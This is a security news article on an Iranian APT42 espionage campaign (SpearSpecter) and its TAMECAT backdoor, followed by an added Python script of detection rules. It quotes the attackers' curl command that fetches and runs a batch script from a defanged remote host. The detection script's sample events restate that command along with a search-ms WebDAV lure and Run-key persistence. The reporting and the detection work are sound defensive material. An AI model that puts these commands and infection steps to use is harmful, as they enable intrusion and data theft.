A dangerous espionage campaign is targeting senior government and defense officials worldwide. Iranian hackers are using fake conference invitations and meeting requests to trick victims.
The attackers spend weeks building trust before striking. They reach out through WhatsApp to make their messages look legitimate.
This campaign, known as SpearSpecter, combines patience with powerful malware to steal sensitive information.
The attackers work for Iran’s Islamic Revolutionary Guard Corps Intelligence Organization. They operate under several names including APT42, Mint Sandstorm, Educated Manticore, and CharmingCypress.
Their main goal is stealing sensitive information from people with access to government secrets. What makes this group dangerous is how they adapt their methods and use both credential theft and long-term spying tools.
Israel National Digital Agency security researchers identified the malware and uncovered the scope of the operation. The campaign has been running for months with no signs of stopping.
The attackers target both officials and family members to increase pressure and find new entry points.
Advanced Infection Through WebDAV and PowerShell
The infection starts when victims receive a link claiming to be an important document for a meeting. When clicked, the link redirects to a file on OneDrive.
Attackers abuse the Windows search-ms protocol to trigger a popup asking users to open Windows Explorer. If victims accept, their computer connects to the attacker’s WebDAV server.
The WebDAV server displays what looks like a PDF file, but it’s actually a malicious shortcut. When opened, this shortcut runs hidden commands that download a batch script from Cloudflare Workers using the following command:
cmd / c curl --ssl-no-revoke -o vgh.txt hxxps://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%
The script loads TAMECAT, a sophisticated PowerShell-based backdoor that operates entirely in memory. TAMECAT uses AES-256 encryption to communicate with command servers through multiple channels including web traffic, Telegram, and Discord.
TAMECAT collects browser passwords by launching Microsoft Edge with remote debugging enabled and suspending Chrome processes. It captures screenshots every fifteen seconds and searches for documents. All stolen data is split into five-megabyte chunks and uploaded.
To survive restarts, TAMECAT creates registry entries that run batch files at login. The malware avoids detection by using trusted Windows programs. Researchers found attackers using Cloudflare Workers for command infrastructure.
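As an added defender-side example (not code from the original report or from the researchers), the following Python runs simple detection rules for the behaviours described above over constructed sample process-creation events: a search-ms URI pointing Explorer at a remote WebDAV location, a curl download renamed to a .bat, Edge started with remote debugging, and a Run-key entry that launches a batch file. The host 203.0.113.5, the Run value name, the local paths and the event format are assumptions.

```python
import re

# Constructed sample process-creation events (image name + command line); not real telemetry.
# The hxxps:// URL is the defanged one quoted in the report; 203.0.113.5 is a documentation IP.
SAMPLE_EVENTS = [
    {"image": "explorer.exe",
     "cmdline": r'explorer.exe "search-ms:query=meeting&crumb=location:\\203.0.113.5@80\DavWWWRoot"'},
    {"image": "cmd.exe",
     "cmdline": "cmd /c curl --ssl-no-revoke -o vgh.txt hxxps://line.completely.workers.dev/aoh5 "
                "& rename vgh.txt temp.bat & temp.bat"},
    {"image": "msedge.exe",
     "cmdline": "msedge.exe --remote-debugging-port=9222"},
    {"image": "reg.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ "
                r"/d C:\Users\u\AppData\Local\Temp\temp.bat"},
    {"image": "cmd.exe", "cmdline": r"cmd /c dir C:\Users\u\Documents"},  # benign control
]

# Each rule is (description, compiled regex over the command line).
RULES = [
    ("search-ms URI sending Explorer to a UNC/WebDAV location",
     re.compile(r"search-ms:.*crumb=location:\\\\", re.I)),
    ("curl download with revocation checks disabled, then renamed to a .bat",
     re.compile(r"curl\b.*--ssl-no-revoke.*-o\s+\S+.*rename\s+\S+\s+\S+\.bat", re.I)),
    ("Edge launched with remote debugging enabled",
     re.compile(r"msedge\.exe.*--remote-debugging-port=\d+", re.I)),
    ("Run-key persistence pointing at a batch file",
     re.compile(r"CurrentVersion\\Run\b.*\.bat\b", re.I)),
]


def classify(event):
    """Return the descriptions of every rule the event's command line matches."""
    return [name for name, rx in RULES if rx.search(event["cmdline"])]


def scan(events):
    """Return (image, matched_rules) for each event that triggers at least one rule."""
    return [(e["image"], hits) for e in events if (hits := classify(e))]


if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(image, "->", "; ".join(hits))
```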